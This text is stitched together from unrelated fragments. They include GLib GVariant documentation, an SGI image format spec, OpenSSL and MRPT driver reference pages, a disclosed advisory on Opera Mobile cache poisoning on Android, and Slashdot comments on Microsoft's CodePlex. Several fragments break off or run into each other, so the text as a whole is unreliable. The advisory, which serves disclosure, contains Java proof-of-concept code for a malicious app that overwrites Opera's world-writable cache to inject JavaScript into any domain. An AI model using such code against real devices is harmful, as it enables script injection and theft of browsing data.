- Prev by Date: Re: "claim", etc. (was Re: C Standard Regarding Null Pointer Dereferencing)
- Next by Date: Re: volatile Info
- Previous by thread: Re: volatile Info
- Next by thread: Re: volatile Info
- Index(es):
|
http://coding.derkeiler.com/Archive/C_CPP/comp.lang.c/2010-08/msg00455.html
|
CC-MAIN-2016-30
|
en
|
refinedweb
|
suported..
Examples
GVariant *value1, *value2, *value3, *value4; value1 = g_variant_new ("y", 200); value2 = g_variant_new ("b", TRUE); value3 = g_variant_new ("d", 37.5): value4 = g_variant_new ("x", G_GINT64_CONSTANT (998877665544332211)); { gdouble floating; gboolean truth; gint64 bignum; g_variant_get (value1, "y", NULL); /* ignore the value. */ g_variant_get (value2, "b", &truth); g_variant_get (value3, "d", &floating); g_variant_get (value4, "x", &bignum); }
Strings
Characters:
s,
o,
g
String conversions occur to and from standard nul-terminated C strings. Upon encountering an
'
s', '
o' or '
g' in a format string,
g_variant_new() takes a
(const
gchar *) and makes a copy of it.
NULL is not a valid string.).
Examples
GVariant *value1, *value2, *value3; value1 = g_variant_new ("s", "hello world!"); value2 = g_variant_new ("o", "/must/be/a/valid/path"); value3 = g_variant_new ("g", "iias"); #if 0 g_variant_new ("s", NULL); /* not valid: NULL is not a string. */ #endif { gchar *result; g_variant_get (value1, "s", &result); g_print ("It was '%s'\n", result); g_free (result); }.
Examples
GVariantBuilder *builder; GVariant *value; builder = g_variant_builder_new (G_VARIANT_TYPE ("as")); g_variant_builder_add (builder, "s", "when"); g_variant_builder_add (builder, "s", "in"); g_variant_builder_add (builder, "s", "the"); g_variant_builder_add (builder, "s", "course"); value = g_variant_new ("as", builder); g_variant_builder_unref (builder); { GVariantIter *iter; gchar *str; g_variant_get (value, "as", &iter); while (g_variant_iter_loop (iter, "s", &str)) g_print ("%s\n", str); g_variant_iter_free (iter); } g_variant_unref (value);.
Examples
GVariant *value1, *value2, *value3, *value4, *value5, *value6; value1 = g_variant_new ("ms", "Hello world"); value2 = g_variant_new ("ms", NULL); value3 = g_variant_new ("(m(ii)s)", TRUE, 123, 456, "Done"); value4 = g_variant_new ("(m(ii)s)", FALSE, -1, -1, "Done"); /* both '-1' are ignored. */ value5 = g_variant_new ("(m@(ii)s)", NULL, "Done"); { GVariant *contents; const gchar *cstr; gboolean just; gint32 x, y; gchar *str; g_variant_get (value1, "ms", &str); if (str != NULL) g_print ("str: %s\n", str); else g_print ("it was null\n"); g_free (str); g_variant_get (value2, "m&s", &cstr); if (cstr != NULL) g_print ("str: %s\n", cstr); else g_print ("it was null\n"); /* don't free 'cstr' */ /* NULL passed for the gboolean *, but two 'gint32 *' still collected */ g_variant_get (value3, "(m(ii)s)", NULL, NULL, NULL, &str); g_print ("string is %s\n", str); g_free (str); /* note: &s used, so g_free() not needed */ g_variant_get (value4, "(m(ii)&s)", &just, &x, &y, &cstr); if (just) g_print ("it was (%d, %d)\n", x, y); else g_print ("it was null\n"); g_print ("string is %s\n", cstr); /* don't free 'cstr' */ g_variant_get (value5, "(m*s)", &contents, NULL); /* ignore the string. */ if (contents != NULL) { g_variant_get (contents, "(ii)", &x, &y); g_print ("it was (%d, %d)\n", x, y); g_variant_unref (contents); } else g_print ("it was null\n"); }
Tuples
Characters:
()
Tuples are handled by handling each item in the tuple, in sequence. Each item is handled in the usual way.
Examples
GVariant *value1, *value2; value1 = g_variant_new ("(s(ii))", "Hello", 55, 77); value2 = g_variant_new ("()"); { gchar *string; gint x, y; g_variant_get (value1, "(s(ii))", &string, &x, &y); g_print ("%s, %d, %d\n", string, x, y); g_free (string); g_variant_get (value2, "()"); /* do nothing... */ }
Dictionaries
Characters:
{}
Dictionary entries are handled by handling first the key, then the value. Each.
Examples
GVariant *value1, *value2; value1 = g_variant_new ("(i@ii)", 44, g_variant_new_int32 (55), 66); /* note: consumes floating reference count on 'value1' */ value2 = g_variant_new ("(@(iii)*)", value1, g_variant_new_string ("foo")); { const gchar *string; GVariant *tmp; gsize length; gint x, y, z; g_variant_get (value2, "((iii)*)", &x, &y, &z, &tmp); string = g_variant_get_string (tmp, &length); g_print ("it is %d %d %d %s (length=%d)\n", x, y, z, string, (int) length); g_variant_unref (tmp); /* quick way to skip all the values in a tuple */ g_variant_get (value2, "(rs)", NULL, &string); /* or "(@(iii)s)" */ g_print ("i only got the string: %s\n", string); g_free (string); }.
|
http://developer.gnome.org/glib/unstable/gvariant-format-strings.html
|
crawl-003
|
en
|
refinedweb
|
Paul Haeberli
Silicon Graphics Computer Systems
paulhaeberli@yahoo.com].
And this function will read a long value from the file:
static long getlong(inf) FILE *inf; { unsigned char buf[4]; fread(buf,4,1,inf); return (buf[0]<<24)+(buf[1]<<16)+(buf[2]<<8)+(buf[3]<<0); }
If the image is not run length encoded, this is the structure:
The HeaderIf the image is run length encoded, this is the structure:
The Image Data
The Header
The Offset Tables
The Image Data
The header consists of the following:
Size | Type | Name | Description 2 bytes | short | MAGIC | IRIS image file magic number 1 byte | char | STORAGE | Storage format 1 byte | char | BPC | Number of bytes per pixel channel 2 bytes | ushort | DIMENSION | Number of dimensions 2 bytes | ushort | XSIZE | X size in pixels 2 bytes | ushort | YSIZE | Y size in pixels 2 bytes | ushort | ZSIZE | Number of channels 4 bytes | long | PIXMIN | Minimum pixel value 4 bytes | long | PIXMAX | Maximum pixel value 4 bytes | char | DUMMY | Ignored 80 bytes | char | IMAGENAME | Image name 4 bytes | long | COLORMAP | Colormap ID 404 bytes | char | DUMMY | Ignored++; } else { pixel = *iptr++; while(count--) *optr++ = pixel; } } }); }
|
http://www.talisman.org/~erlkonig/misc/sgi-image-file-format-spec.html
|
crawl-003
|
en
|
refinedweb
|
#include <openssl/ssl.h>
void SSL_CTX_set_tmp_dh_callback(SSL_CTX *ctx,
DH *(*tmp_dh_callback)(SSL *ssl, int is_export, int keylength));
long SSL_CTX_set_tmp_dh(SSL_CTX *ctx, DH *dh);
void SSL_set_tmp_dh_callback(SSL_CTX *ctx,
DH *(*tmp_dh_callback)(SSL *ssl, int is_export, int keylength));
long SSL_set_tmp_dh(SSL *ssl, DH *dh)
DH *(*tmp_dh_callback)(SSL *ssl, int is_export, int keylength));
SSL_CTX_set_tmp_dh_callback() sets the callback function for ctx to be
used when a DH parameters are required to tmp_dh_callback. The call-
back is inherited by all ssl objects created from ctx.
SSL_CTX_set_tmp_dh() sets are negotiated using
the ephemeral/temporary DH key and the key supplied and certified by
the certificate chain is only used for signing. Anonymous ciphers
(without a permanent server key) also use ephemeral DH keys.
Using ephemeral DH key exchange yields forward secrecy, as the connec-
tion can only be decrypted, when the DH key is known. By generating a
temporary DH key inside the server application that is lost when the
application is left, it becomes impossible for an attacker to decrypt
past sessions, even if he gets hold of the normal (certified) key, as
this key was only used for signing.
In order to perform a DH key exchange the server must use a DH group
(DH parameters) and generate a DH key. The server will always generate
a new DH key during the negotiation, when the DH parameters are sup-
plied.
an attacker may specialize on a very often used DH group. Applications
should therefore generate their own DH parameters during the installa-
tion process using the openssl dhparam(1) application. parame-
ters were generated. The generation of DH parameters during installa-
tion is therefore recommended.
An application may either directly specify the DH parameters or can
supply the DH parameters via a callback function. The callback approach
has the advantage, that the callback may supply DH parameters for dif-
ferent han-
dling)
0.9.8d 2001-09-06 SSL_CTX_set_tmp_dh_callback(3)
|
http://www.syzdek.net/~syzdek/docs/man/.shtml/man3/SSL_CTX_set_tmp_dh_callback.3.html
|
crawl-003
|
en
|
refinedweb
|
This "software driver" implements the communication protocol for interfacing a SICK LMS 2XX laser scanners through a standard RS232 serial port (or a USB2SERIAL converter).
The serial port is opened upon the first call to "doProcess" or "initialize", so you must call "loadConfig" before this, or manually call "setSerialPort". Another alternative is to call the base class method C2DRangeFinderAbstract::bindIO, but the "setSerialPort" interface is probably much simpler to use.
For an example of usage see the example in "samples/SICK_laser_serial_test". See also the example configuration file for rawlog-grabber in "share/mrpt/config_files/rawlog-grabber".
PARAMETERS IN THE ".INI"-LIKE CONFIGURATION STRINGS: ------------------------------------------------------- [supplied_section_name] COM_port_WIN = COM1 // Serial port to connect to COM_port_LIN = ttyS0 COM_baudRate = 38400 // Possible values: 9600 (default), 38400, 5000000 mm_mode = 1/0 // 1: millimeter mode, 0:centimeter mode (Default=0) FOV = 180 // Field of view: 100 or 180 degrees (Default=180) resolution = 50 // Scanning resolution, in units of 1/100 degree. Valid values: 25,50,100 (Default=50) pose_x=0.21 // Laser range scaner 3D position in the robot (meters) pose_y=0 pose_z=0.34 pose_yaw=0 // Angles in degrees pose_pitch=0 pose_roll=0
Definition at line 70 of file CSickLaserSerial.h.
#include <mrpt/hwdrivers/CSickLaserSerial.h>
Definition at line 84 of file CGenericSensor.h.
Definition at line 85 of file CGenericSensor.h.
The current state of the sensor.
Definition at line 90 of file CGenericSensor.h.
Constructor.
Destructor.
Like appendObservations() but for just one observation.
Definition at line 155 of file CGenericSensor.h.
This method must be called by derived classes to enqueue a new observation in the list to be returned by getObservations.
Passed objects must be created in dynamic memory and a smart pointer passed. Example of creation:
CObservationGPSPtr o = CObservationGPSPtr( new CObservationGPS() ); o-> .... // Set data appendObservation(o);
If several observations are passed at once in the vector, they'll be considered as a block regarding the grabbing decimation factor.
Binds the object to a given I/O channel.
The stream object must not be deleted before the destruction of this class.
Creates a sensor by a name of the class.
Typically the user may want to create a smart pointer around the returned pointer, whis is made with:
CGenericSensorPtr sensor = CGenericSensorPtr( CGenericSensor::createSensor("XXX") );
Just like createSensor, but returning a smart pointer to the newly created sensor object.
Definition at line 188 of file CGenericSensor.h.
Main method for a CGenericSensor.
Implements mrpt::hwdrivers::CGenericSensor.
Reimplemented in mrpt::hwdrivers::CLMS100Eth.
Specific laser scanner "software drivers" must process here new data from the I/O stream, and, if a whole scan has arrived, return it.
This method will be typically called in a different thread than other methods, and will be called in a timely fashion.
Implements mrpt::hwdrivers::C2DRangeFinderAbstract.
Mark as invalid those ranges in a set of forbiden angle ranges.
Mark as invalid those points which (x,y) coordinates fall within the exclusion polygons.
Definition at line 138 of file CSickLaserSerial.h.
If performing several tries in ::initialize(), this is the current try loop number.
Definition at line 159 of file CSickLaserSerial.h.
Definition at line 241 of file CGenericSensor.h.
Get the last observation from the sensor, if available, and unmarks it as being "the last one" (thus a new scan must arrive or subsequent calls will find no new observations).
Returns a list of enqueued objects, emptying it (thread-safe).
The objects must be freed by the invoker.
Definition at line 100 of file CGenericSensor.h.
Definition at line 150 of file CSickLaserSerial.h.
Definition at line 156 of file CSickLaserSerial.h.
Definition at line 102 of file CGenericSensor.h.
Definition at line 129 of file CSickLaserSerial.h.
The current state of the sensor.
Definition at line 98 of file CGenericSensor.h.
Set-up communication with the laser.
Called automatically by rawlog-grabber. If used manually, call after "loadConfig" and before "doProcess".
In this class this method does nothing, since the communications are setup at the first try from "doProcess" or "doProcessSimple".
Reimplemented from mrpt::hwdrivers::CGenericSensor.
Returns false on error.
Send a command to change the LMS comms baudrate, return true if ACK is OK. baud can be: 9600, 19200, 38400, 500000.
Assures laser is connected and operating at 38400, in its case returns true.
Send a status query and wait for the answer. Return true on OK.
Returns false if timeout.
Returns false if timeout.
Loads the generic settings common to any sensor (See CGenericSensor), then call to "loadConfig_sensorSpecific"
Loads specific configuration for the device from a given source of configuration parameters, for example, an ".ini" file, loading from the section "[iniSection]" (see utils::CConfigFileBase and derived classes) See hwdrivers::CSickLaserSerial for the possible parameters..
Sends a formated text to "debugOut" if not NULL, or to cout otherwise.
Referenced by mrpt::math::CLevenbergMarquardtTempl< VECTORTYPE, USERPARAM >::execute().
Register a class into the internal list of "CGenericSensor" descendents.
Used internally in the macros DEFINE_GENERIC_SENSOR, etc...
Can be used as "CGenericSensor::registerClass( SENSOR_CLASS_ID(CMySensor) );" if building custom sensors outside mrpt libraries in user code.
Send header+command-data+crc and waits for ACK. Return false on error.
Changes the serial port baud rate (call prior to 'doProcess'); valid values are 9600,38400 and 500000.
This is not needed if the configuration is loaded with "loadConfig".
Definition at line 134 of file CSickLaserSerial.h.
Set the extension ("jpg","gif","png",...) that determines the format of images saved externally The default is "jpg".
Definition at line 233 of file CGenericSensor.h.
The quality of JPEG compression, when external images is enabled and the format is "jpg".
Definition at line 238 of file CGenericSensor.h.
Enables/Disables the millimeter mode, with a greater accuracy but a shorter range (default=false) (call prior to 'doProcess') This is not needed if the configuration is loaded with "loadConfig".
Definition at line 144 of file CSickLaserSerial.h.
Set the path where to save off-rawlog image files (will be ignored in those sensors where this is not applicable).
An empty string (the default value at construction) means to save images embedded in the rawlog, instead of on separate files.
Reimplemented in mrpt::hwdrivers::CCameraSensor, mrpt::hwdrivers::CKinect, and mrpt::hwdrivers::CSwissRanger3DCamera.
Definition at line 225 of file CGenericSensor.h.
Set the scanning field of view - possible values are 100 or 180 (default) (call prior to 'doProcess') This is not needed if the configuration is loaded with "loadConfig".
Definition at line 149 of file CSickLaserSerial.h.
Set the scanning resolution, in units of 1/100 degree - Possible values are 25, 50 and 100, for 0.25, 0.5 (default) and 1 deg.
(call prior to 'doProcess') This is not needed if the configuration is loaded with "loadConfig".
Definition at line 155 of file CSickLaserSerial.h.
Definition at line 103 of file CGenericSensor.h.
Changes the serial port to connect to (call prior to 'doProcess'), for example "COM1" or "ttyS0".
This is not needed if the configuration is loaded with "loadConfig".
Definition at line 126 of file CSickLaserSerial.h.
Tries to open the com port and setup all the LMS protocol. Returns true if OK or already open.
Disables the scanning mode (in this class this has no effect).
Implements mrpt::hwdrivers::C2DRangeFinderAbstract.
Enables the scanning mode (in this class this has no effect).
Implements mrpt::hwdrivers::C2DRangeFinderAbstract.
Definition at line 82 of file CSickLaserSerial.h.
Baudrate: 9600, 38400, 500000.
Definition at line 104 of file CSickLaserSerial.h.
If set to non-empty, the serial port will be attempted to be opened automatically when this class is first used to request data from the laser.
Definition at line 102 of file CSickLaserSerial.h.
The extension ("jpg","gif","png",...) that determines the format of images saved externally.
Definition at line 139 of file CGenericSensor.h.
For JPEG images, the quality (default=95%).
Definition at line 140 of file CGenericSensor.
Definition at line 75 of file CSickLaserSerial.h.
Will be !=NULL only if I created it, so I must destroy it at the end.
Definition at line 103 of file CSickLaserSerial.h.
Default = 1.
Definition at line 105 of file CSickLaserSerial.h.
Definition at line 106 of file CSickLaserSerial.h.
The path where to save off-rawlog images: empty means save images embedded in the rawlog.
Definition at line 138 of file CGenericSensor.h.
See CGenericSensor.
Definition at line 125 of file CGenericSensor.h.
Definition at line 100 of file CSickLaserSerial.h.
100 or 180 deg
Definition at line 76 of file CSickLaserSerial.h.
1/100th of deg: 100, 50 or 25
Definition at line 77 of file CSickLaserSerial.h.
See CGenericSensor.
Definition at line 128 of file CGenericSensor.h.
The sensor 6D pose:
Definition at line 80 of file CSickLaserSerial.h.
Definition at line 134 of file CGenericSensor.h.
The I/O channel (will be NULL if not bound).
Definition at line 81 of file C2DRangeFinderAbstract.h.
|
http://reference.mrpt.org/stable/classmrpt_1_1hwdrivers_1_1_c_sick_laser_serial.html
|
crawl-003
|
en
|
refinedweb
|
1 Background
=============
Android applications are executed in a sandbox environment, to ensure that no
application can access sensitive information held by another, without adequate
privileges. For example, Opera Mobile holds sensitive information such as
cookies, cache and history, and this cannot be accessed by third-party apps.. By running applications as different users, files
owned by one application cannot be accessed by another (unless access is
explicitly allowed).
2 Opera Mobile Internals
========================
Opera Mobile for Android maintains a cache of web pages:
• The cache is stored under the directory /data/data/com.opera.browser with UNIX
file permissions [rwxrwx--x].
• All directories from the cache directory to the root are globally executable.
• The cache metadata file can be found under
/data/data/com.opera.browser/dcache4.url with permissions [rw-rw-rw-].
• The cache data can be found under the directory
/data/data/com.opera/browser/g_<number> with permissions [rwxrwxrwx]. The UNIX
file permissions of the cache files are [rw-rw-rw-].
• The cache directory contains other files which are publically accessible, such
as under the sesn and revocation directories.
3 Vulnerability
===============
The Opera Mobile cache files (metadata and data) have insecure file permissions:
• The cache metadata file (dcache4.url) is globally readable and writable as
explained in the aforementioned permissions analysis.
• The cache data itself are globally readable and writable as explained in the
aforementioned permissions analysis.
Hence a 3rd party application with no permissions may access Opera Mobile's
cache, thus break Android's sandboxing model:
• It may read the cache. 3rd party parsers are publicly available.
• It may alter the cache with arbitrary data or code, in order to conduct
phishing attacks, or execute JavaScript code in the context of an arbitrary
domain.
It should be noted that further research may shed light on how to attack the
files found under the sesn and revocation directories.
4 Impact
========
By exploiting this vulnerability a malicious, non-privileged application may
inject JavaScript code into the context of an arbitrary domain; therefore, this
vulnerability has the same implications as global XSS, albeit from an installed
application rather than another website. Furthermore, since the cache can be
read, web-pages accessed by the victim may be leaked to the attacker.
5 Proof-of-Concept
==================
Our goal is to poison the cache of a target domain with arbitrary JavaScript
code. We must build a valid cache entry so that Opera would be tricked into
loading our malicious code. This can be achieved in two different ways:
1. Reverse engineer the cache metadata and data structure and build a malicious
cache entry using that knowledge..
3. Using the MiTM, we can alter that data before reaching Opera, and inject
malicious code into it, even without damaging its functionality.
4. Opera has now been tricked into creating a valid cache entry, containing our
malicious content. This information (the malicious dcache4.url together with
relevant cache data) can be now bundled with a malicious app so it is dumped
to the disk once the app is launched, using the following code (our code also
executes Opera once the cache is poisoned):
public class CachePoisoningActivity extends Activity {
@Override
public void onCreate(Bundle savedInstanceState)
{
super.onCreate(savedInstanceState);
setContentView(R.layout.main);
dumpToFilesystem("dcache4.url",
"/data/data/com.opera.browser/cache/dcache4.url");
dumpToFilesystem("poisonedfile",
"/data/data/com.opera.browser/cache/g_0000/poisonedfile");
Intent i = new Intent();
i.setClassName("com.opera.browser", "com.opera.Opera");
i.setData(Uri.parse(""));
startActivity(i);
}
private void dumpToFilesystem(String assetName, String dstPath)
{
try {
InputStream input = getAssets().open(assetName);
FileOutputStream output = new FileOutputStream(dstPath);
byte[] buffer = new byte[1024];
int len = -1;
while (-1 != (len = input.read(buffer)))
output.write(buffer, 0, len);
output.close();
input.close();
} catch (IOException e) {}
File f = new File(dstPath);
f.setReadable(true, false);
f.setWritable(true, false);
}
}
6 Vulnerable versions
=====================
Opera Mobile 11.1 has been found vulnerable.
7 Vendor response
=================
Opera Mobile 11.1 update 2 has been released, which incorporates a fix for this
bug.
8 Credit
========
Roee Hay <roeeh@il.ibm.com>
9 Acknowledgements
==================
We would like to thank the Opera team for the efficient and quick way in which
it handled this security issue.
10 References
=============
• Original advisory:
• Blog post:
• Video of the PoC:
• Android 11.1 update 2 ready for download:
Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!
|
http://www.linuxrocket.net/14953-Advisory_Opera_Mobile_Cache_Poisoning_XAS.htm
|
crawl-003
|
en
|
refinedweb
|
#include <openssl/ssl.h>
int SSL_pending(const SSL *ssl);
SSL_pending() returns the number of bytes which are available inside
ssl for immediate read.
Data are received in blocks from the peer. Therefore data can be
buffered inside ssl and are ready for immediate retrieval with
SSL_read(3).
The number of bytes pending is returned.
SSL_pending() takes into account only bytes from the TLS/SSL record
that is currently being processed (if any). If the SSL object's
read_ahead flag is set, additional protocol bytes may have been read
containing more TLS/SSL records; these are ignored by SSL_pending().
Up to OpenSSL 0.9.6, SSL_pending() does not check if the record type of
pending data is application data.
SSL_read(3), ssl(3)
0.9.8d 2005-03-30 SSL_pending(3)
|
http://www.syzdek.net/~syzdek/docs/man/.shtml/man3/SSL_pending.3.html
|
crawl-003
|
en
|
refinedweb
|
#include <openssl/ssl.h>
SSL *SSL_new(SSL_CTX *ctx);.
The following return values can occur:
NULL
The creation of a new SSL structure failed. Check the error stack
to find out the reason.
Pointer to an SSL structure
The return value points to an allocated SSL structure.
SSL_free(3), SSL_clear(3), SSL_CTX_set_options(3), SSL_get_SSL_CTX(3),
ssl(3)
0.9.8d 2001-08-17 SSL_new(3)
|
http://www.syzdek.net/~syzdek/docs/man/.shtml/man3/SSL_new.3.html
|
crawl-003
|
en
|
refinedweb
|
>>?"
No it isn't. Now let's get back to work. (Score:1, Interesting)
Codeplex was created to undermine the open source and more particularly the free software movement. Well, they launched their Tet offensive and it was massively funded, but it failed.
They'll have to try something else.
Re: (Score:3, Insightful)
Yep, "in a string of attempts to play nicely with open source" sounds like "in a string of attempts to nicely play open source" but it's not really the same thing.
Re: (Score:2)
what part of embrace extend extinguish does "attempts to play nicely with open source" fit in again?
oh yes, clearly, we must be ignorant and have forgotten? Surely the leopard has changed their spots, huh?
Has anyone seen MS ever do something pro open source/pro free software? The answer is no, and it never will happen either. All they do is try to cover their tail when they screw up, as is common.
Re: (Score:2)
Has anyone seen MS ever do something pro open source/pro free software?
Off the top of my head: [asp.net]
Re: (Score:2)
Umm, isn't this to benefit
.net, specifically ASP and involves creep via Mono?
how is that a gain for open source?
Re: (Score:2)
Re: (Score:2)
How would this benefit
.net? .net is (mostly) a serverside technology,and it already knows all about cultures.
Re: (Score:2)
Pro free tools: [microsoft.com]
Re: (Score:2, Insightful)
Re: (Score:1, Informative)
I had actually forgotten that codeplex even existed until seeing it mentioned here on Slashdot today. Basically, codeplex is a home for Windows zealots who kind of like the idea of open source and want to dabble in it but refuse to leave the comforting confines of their OS of choice. So now, they have somewhere to hang out. It serves MS's purposes as it gives them something to hopefully take a little of the wind out of the sails of cross-platform real open source development. Personally, I think it a bit
Re: (Score:2)
A lot of Microsoft's open source projects, including projects like MEF, build on Mono and were subtly patched but not announced to be fixed as such. So they aren't "announcing to the world" that it works on Mono, but their developers are making sure it's compatible.
Besides, what does it matter which platform your software layer resides on? If you think it's absurd to build OSS on proprietary software, then I suppose you only write software and packages for the most free distro, depending on your definition
Re: (Score:2)
Of which, your only valid example is VB6, which had a syntax that they broke to allow it to interface with
.NET.
Did you ever write anything in Cobol? Any other "dead" language? That's natural. The problem companies have is that they think that once their software is written, their responsibility to do anything with it is over. But owning software is sort of like owning a car, eventually compared to all the other cars, it's going to look rusty and antiquated, eventually the shops will run out of parts for it
Re: (Score:1)
I had actually forgotten that SourceForge even existed until seeing it mentioned here on Slashdot today. Basically, SourceForge is a home for Open Source/*nix/FS zealots who kind of like the idea of open source and want to dabble in it but refuse to leave the comforting confines of their OS of choice. So now, they have somewhere to hang out. It serves the zealot's purposes as it gives them something to hopefully take a little of the wind out of the sails of the Windows stack of software. Personally, I think
Re: (Score:2)
Err? I didn't recall seeing anything even close to what you describe.
As far as I can tell, they're just trying to foster open source development on Windows because it's a developer issue. Some developers prefer and only engage in open source development, causing them to gravitate to Linux, BSD, etc. Microsoft hates losing developers, because users, slowly but surely, follow them and where the good applications are.
It's not a grand "Tet offensive". And it was anything but massively funded.
If MS was really serious... (Score:4, Insightful)
They could endow a trust fund for SourceForget.net. And if they had ideas for a better forge, they could make code submissions to SourceForge.net.
Re: (Score:2)
Why? Why can there only be one open source code repository?
Further, ultimately, as a developer, do you even care what repository the code comes from? I just google what I need, and wherever I land, I land.
Re:If MS was really serious... (Score:5, Insightful)
I'm not saying there should only be one public forge. I'm just saying that would be one way for MS to get away from people's distrust in anything they back. Because I think most people would trust SF.net to not be corrupted the kind of thing I proposed.
No. But as a project contributor, maybe. If this was the MS of the 1990's, I wouldn't trust a forge they owned one tiny bit - there would almost certainly be a trap hidden in the legalese. Nowadays, I'm not sure.
But here's another way to look at it: aside from branding, what might MS's motives be for setting this thing up? Based on their past actions, it's pretty clear that they're not angels.
Re: (Score:1)
Re: (Score:2, Informative)
Sourceforge's engine is closed source.
I asked.
You can't make "code submissions" to it.
Re: (Score:3, Informative)
and closed it again after some time.
I think an open source community driven competitor started using that code and then got killed or something, can't remember for sure.
Re: (Score:3, Insightful)
The thing with Microsoft is that nothing you create based on their 'technologies' can truly be open. The Shared Source license is likewise not a very 'open' or 'free' (both in speech and in beer) license. The problem with Microsoft is that they have used their financial and patent weight against open source in the past and will probably continue doing so. If Microsoft really want, they can revoke all their permissions and promises at any point in time and all projects based on the Shared Source License woul
Re: (Score:2)
The specs are published here:
SMB: [microsoft.com]
SMB2: [microsoft.com]
You say "We have reverse engineered it for a while"... Who's "we"? Do you speak for the Samba team? The Samba team not only has access to the above specs, but t
Re: (Score:2)
I wish I could simply forget SourceForge.net
Re: (Score:2)
I wish I could simply forget SourceForge.net
Why would that be?
Re: (Score:2)
SourceForget.net
What a splendid idea. A source revision control system hooked up straight to
/dev/null, with a webinterface. FUND IT!
Re: (Score:2)
They did this ~ 10 years ago. The result was windows ME.
Re: (Score:3, Insightful)
Re: (Score:3, Informative)
So could Google - but no one seems to be bitching about Google Code.
Google [google.com] has been a [android.com] great [chromium.org] friend [google.com] of open source. They have earned and continue to earn a great deal of trust and respect from the open source and free software community.
Compare [theregister.co.uk] to the current CEO of Microsoft and I think it will be clearer why Microsoft needs to do more.
Re: (Score:2)
I dunno, just about every non-Google project I've seen initially on Google Code has moved off of it to GitHub or someplace else in a fairly short time, usually after some complaints about it.
Though the complaints have been about Google reinventing the wheel and not doing it particularly well from the perspective of the projects involved, rather than about any presumed nefarious motives, most likely because Google, unlike MS, doesn't have a
Re: (Score:2)
SourceForget?
Is that a typo or a commentary on the quality of SourceForge?
Re: (Score:2)
And if they had ideas for a better forge, they could make code submissions to SourceForge.net.
CodePlex uses TFS for source control. It makes sense for projects that are already centered around MS tech in other ways, and especially if developers use VS, but I somehow doubt that SourceForge would appreciate that.
By the way, it's interesting how the article is about CodePlex Foundation, while most comments are about CodePlex - which is a different thing (yeah, I know, the naming is confusing as hell).
Let me get this straight (Score:4, Insightful)
An organization that wants to make open source products based off Microsoft will only get more Open Source Cred if they separate from Microsoft?
It seems like Microsoft is stuck in a position to make no concession. You don't like Microsoft. You'd like it a bit more if it were friendlier to Open Source. Microsoft starts an Open Source Initiative. It doesn't quite live up to Expectations. Now, the only way this new initiative can redeem itself is to become independent of Microsoft.
Wouldn't then Microsoft NOT have an open source initiative, and put them back at square one? Does becoming independent of Microsoft allow them to better work on Microsoft code?
Re:Let me get this straight (Score:5, Insightful)
Microsoft eventually wants
.NET to be competitive with the Java platform.
They know that Java has a massive, massive advantage in terms of OSS 3rd party library availability. As mentioned in the article, this comes from high profile Java OSS projects like Apache's Jakarta, Eclipse and others.
So Codeplex is their attempt at getting a similar ball rolling for
.NET. We'll see if it succeeds, I doubt it will catch on in a similar fashion though, .NET is doomed to niche Microsoft operating systems.
Re: (Score:2)
Microsoft eventually wants
.NET to be competitive with the Java platform.
I'm curious by what standard you think it isn't. Certainly each has its advantages and disadvantages, and there's a lot of work for both out there.
But that being said, as someone who's spent years developing professionally with each, I'd say the list in your
.sig is largely slanted/inaccurate/dubious, so, maybe you're just a guy who really likes Java.
Re: (Score:1, Troll)
I'm biased as fuck.
But I don't think that takes away from the fact that
.NET adoption is 1/10 that of Java or less nor from the fact that .NET OSS adoption is probably less than 1/10th the size of Java's.
Nor the fact that it's in Microsoft's interest to do so, nor the fact that this is probably an attempt to change that.
Nors for everybody!
Re: (Score:2)
I have had good exposure to two fairly large UK web design/development and bespoke software markets in the UK (South West/West/Bristol and South East/East/London/Anglia) and I have to say its all either PHP, Python or Perl, or its
I think the statistics being used by people like yourselve
Re: (Score:2)
... you know that there's a lot more to
.NET than web development, just as there's a lot more to Java than web development, right?
I only have my own anecdotal experience to go on, but damn near all of my profressional Java projects have involved web development, whereas less than half of my
.NET projects have.
Re: (Score:2)
Re: (Score:2)
I'm biased as fuck.
Fair enough. I respect you for not having any illusions about that.
I don't know that I'd say
.NET adoption is 1/10 of Java's -- in some markets (e.g. phones), definitely, and in the open source world, probably, but in general that doesn't jive with what I've seen in the market. But then, the work I mostly do is of the "writing custom apps (sometimes web, sometimes console, sometimes services, etc.) for business" and I don't have great knowledge of adoption outside of that space.
If nothi
Re: (Score:1)
101 Reasons why Java is better than
.NET - [helpdesk-software.ws]
This article is completely outdated. A signature like this makes it hard to take you seriously.
Re: (Score:1, Flamebait)
It's still quite accurate.
Re: (Score:1)
More importantly, what do you have to say about this: [itjobswatch.co.uk]
Re: (Score:2)
No it is not. I've spotted at least 5 of those items that are outright wrong.
Java is generally better than c#, but you don't need to make shit up to show that.
Re: (Score:2)
Good job fuck mook, there are over a hundred total.
Re:Let me get this straight (Score:4, Insightful)
Show me the
.Net for Solaris, Linux or Mac.
Re: (Score:1)
Not
.NET, but close enough and open source for Solaris, Linux and Mac downloads is available here: [go-mono.com]
Re: (Score:3, Insightful)
I assume you must be one of the codeplex people.
Good luck and GG!
;)
Re: (Score:2)
More people code in
.NET than even use Linux at all.
First and foremost, he never mentions Linux. He mentions Open Source, but surprisingly, open source is not limited to Linux. *GASP* I know.
And if you are going to compare, at least pick something comparable. Like
.NET to Java like he does. I've met a lot more people who know Java than .NET - Though on top of that, I've seen even more C#. But that's just me.
Re: (Score:2)
I've met a lot more people who know Java than
.NET - Though on top of that, I've seen even more C#.
I'm confused by this. You do know that C# is
.NET, right?
Re: (Score:1)
Not really. C# is a language like any other - it's just the best known implementation is for
.NET. If you wanted to, you could write a C# compiler that uses precisely zero .NET, and it'd still be a compiler for C#.
Plus C# is used for Mono and GTK#, neither of which are
.NET. Mono implements the same stuff true, but it's not .NET.
Re: (Score:2)
To me, at this point what you're saying is technically true but in any practical sense... not really.
Kind of like saying that people don't need to breathe to live -- technically, they could get their blood oxygenated any number of ways.
Probably, 99.9%+ of people writing C# code today are using
.NET. For any practical purpose it's not unreasonable to assume that if someone knows more C# devs than Java devs, they also know more .NET devs than Java devs.
Re: (Score:1)
Re: (Score:2)
Sure, and you could write an Erlang compiler for the JVM. But, in the real world today, usable C# compilers exist only for the
.NET (and Mono, which is a .NET clone), and Erlang only for the the BEAM virtual machine (well, older versions exist for a previous, equally-specific, VM.)
Re: (Score:2)
The OP mentions "niche Microsoft operating systems", which places him/her firmly into the linux loony camp. There's nothing wrong with Linux, but believing that the company that still has 60% of the server market and has an even higher percentage of the desktop is "niche" either means the he/she has never left the server room of a bank, or is a loony.
I've coded in
.NET and I've coded in JEE, there are pluses and minuses to both.
